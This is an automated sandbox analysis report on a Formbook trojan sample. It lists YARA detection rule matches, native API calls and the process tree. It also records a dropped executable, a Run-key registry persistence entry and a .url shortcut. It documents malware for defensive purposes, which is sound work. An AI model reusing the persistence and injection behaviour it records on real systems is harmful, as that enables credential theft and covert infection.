Source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.300799185.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000000.433242777.000000000D48F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.300389282.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.333596734.0000000003C01000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001E.00000002.537830907.00000000034D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.308846513.0000000003A5C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001E.00000002.532023661.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: 1a#U00bb.exe PID: 6128, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 5692, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: Djfypqyfx.exe PID: 5068, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: Djfypqyfx.exe PID: 5460, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: wscript.exe PID: 1428, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\Public\Libraries\xfyqpyfjD.url, type: DROPPED	Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
Source: C:\Users\Public\Libraries\xfyqpyfjD.url, type: DROPPED	Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EAB40	5_2_036EAB40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03792B28	5_2_03792B28
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037803DA	5_2_037803DA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378DBD2	5_2_0378DBD2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036FEBB0	5_2_036FEBB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0377FA2B	5_2_0377FA2B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037922AE	5_2_037922AE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E4120	5_2_036E4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036CF900	5_2_036CF900
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E99BF	5_2_036E99BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0379E824	5_2_0379E824
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036EA830	5_2_036EA830
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03781002	5_2_03781002
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037928EC	5_2_037928EC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F20A0	5_2_036F20A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037920A8	5_2_037920A8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DB090	5_2_036DB090
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03791FF1	5_2_03791FF1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0379DFCE	5_2_0379DFCE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036E6E30	5_2_036E6E30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378D616	5_2_0378D616
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03792EF7	5_2_03792EF7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03791D55	5_2_03791D55
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036C0D20	5_2_036C0D20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03792D07	5_2_03792D07
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036DD5E0	5_2_036DD5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037925DD	5_2_037925DD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036F2581	5_2_036F2581
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0378D466	5_2_0378D466
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_036D841F	5_2_036D841F

Source: C:\Windows\SysWOW64\cmd.exe

Code function: String function: 036CB150 appears 66 times

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0370A3B0 NtGetContextThread,LdrInitializeThunk,	5_2_0370A3B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709A50 NtCreateFile,LdrInitializeThunk,	5_2_03709A50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709A20 NtResumeThread,LdrInitializeThunk,	5_2_03709A20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709950 NtQueueApcThread,LdrInitializeThunk,	5_2_03709950
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_03709910
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037099A0 NtCreateSection,LdrInitializeThunk,	5_2_037099A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03709860
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0370B040 NtSuspendThread,LdrInitializeThunk,	5_2_0370B040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709840 NtDelayExecution,LdrInitializeThunk,	5_2_03709840
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709710 NtQueryInformationToken,LdrInitializeThunk,	5_2_03709710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709FE0 NtCreateMutant,LdrInitializeThunk,	5_2_03709FE0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037097A0 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_037097A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709780 NtMapViewOfSection,LdrInitializeThunk,	5_2_03709780
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037096E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_037096E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709540 NtReadFile,LdrInitializeThunk,	5_2_03709540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0370AD30 NtSetContextThread,LdrInitializeThunk,	5_2_0370AD30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037095D0 NtClose,LdrInitializeThunk,	5_2_037095D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709B00 NtSetValueKey,	5_2_03709B00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709A10 NtQuerySection,	5_2_03709A10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709A00 NtProtectVirtualMemory,	5_2_03709A00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709A80 NtOpenDirectoryObject,	5_2_03709A80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037099D0 NtCreateProcessEx,	5_2_037099D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709820 NtEnumerateKey,	5_2_03709820
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037098F0 NtReadVirtualMemory,	5_2_037098F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037098A0 NtWriteVirtualMemory,	5_2_037098A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0370A770 NtOpenThread,	5_2_0370A770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709770 NtSetInformationFile,	5_2_03709770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709760 NtOpenProcess,	5_2_03709760
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709730 NtQueryVirtualMemory,	5_2_03709730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_0370A710 NtOpenProcessToken,	5_2_0370A710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709670 NtQueryInformationProcess,	5_2_03709670
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709660 NtAllocateVirtualMemory,	5_2_03709660
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709650 NtQueryValueKey,	5_2_03709650
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709610 NtEnumerateValueKey,	5_2_03709610
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037096D0 NtCreateKey,	5_2_037096D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709560 NtWriteFile,	5_2_03709560
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_03709520 NtWaitForSingleObject,	5_2_03709520
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 5_2_037095F0 NtQueryInformationFile,	5_2_037095F0

Source: 1a#U00bb.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Djfypqyfx.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\1a#U00bb.exe	Section loaded: system.dll	Jump to behavior
Source: C:\Users\user\Desktop\1a#U00bb.exe	Section loaded: system.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Section loaded: system.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Section loaded: system.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Section loaded: system.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Section loaded: system.dll	Jump to behavior

Source: 1a#U00bb.exe	Virustotal: Detection: 32%
Source: 1a#U00bb.exe	ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\1a#U00bb.exe

File read: C:\Users\user\Desktop\1a#U00bb.exe

Jump to behavior

Source: C:\Users\user\Desktop\1a#U00bb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1a#U00bb.exe "C:\Users\user\Desktop\1a#U00bb.exe"
Source: C:\Users\user\Desktop\1a#U00bb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\Libraries\Djfypqyfx.exe "C:\Users\Public\Libraries\Djfypqyfx.exe"
Source: unknown	Process created: C:\Users\Public\Libraries\Djfypqyfx.exe "C:\Users\Public\Libraries\Djfypqyfx.exe"
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Users\user\Desktop\1a#U00bb.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k	Jump to behavior

Source: C:\Users\user\Desktop\1a#U00bb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B091E540-83E3-11CF-A713-0020AFD79762}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\1a#U00bb.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Djfypqyfxwyivtfoakxovbbaompeayl[1]

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winEXE@13/4@2/1

Source: C:\Users\user\Desktop\1a#U00bb.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\1a#U00bb.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\1a#U00bb.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6124:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01

Source: C:\Users\user\Desktop\1a#U00bb.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\1a#U00bb.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source:	Binary string: wscript.pdbGCTL source: cmd.exe, 00000005.00000002.488066235.0000000005380000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000003.305572932.0000000003502000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.301795534.0000000003371000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000002.543274704.000000000513F000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000003.475337207.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000002.539671067.0000000005020000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000003.480850026.0000000004E88000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000003.305572932.0000000003502000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.301795534.0000000003371000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000002.543274704.000000000513F000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000003.475337207.0000000004CEF000.00000004.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000002.539671067.0000000005020000.00000040.00000800.00020000.00000000.sdmp, wscript.exe, 0000001E.00000003.480850026.0000000004E88000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wscript.pdb source: cmd.exe, 00000005.00000002.488066235.0000000005380000.00000040.10000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 5_2_0371D0D1 push ecx; ret

5_2_0371D0E4

Source: C:\Users\user\Desktop\1a#U00bb.exe

File created: C:\Users\Public\Libraries\Djfypqyfx.exe

Jump to dropped file

Source: C:\Users\user\Desktop\1a#U00bb.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Djfypqyfx			Jump to behavior
Source: C:\Users\user\Desktop\1a#U00bb.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Djfypqyfx			Jump to behavior

Source: C:\Users\Public\Libraries\Djfypqyfx.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\1a#U00bb.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\1a#U00bb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Djfypqyfx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 5_2_03795BA5 rdtsc

5_2_03795BA5

Source: C:\Windows\SysWOW64\cmd.exe

API coverage: 5.7 %

Source: C:\Users\user\Desktop\1a#U00bb.exe

Process information queried: ProcessInformation

Jump to behavior

Source: explorer.exe, 00000014.00000000.457197494.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000014.00000000.429059436.000000000820D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
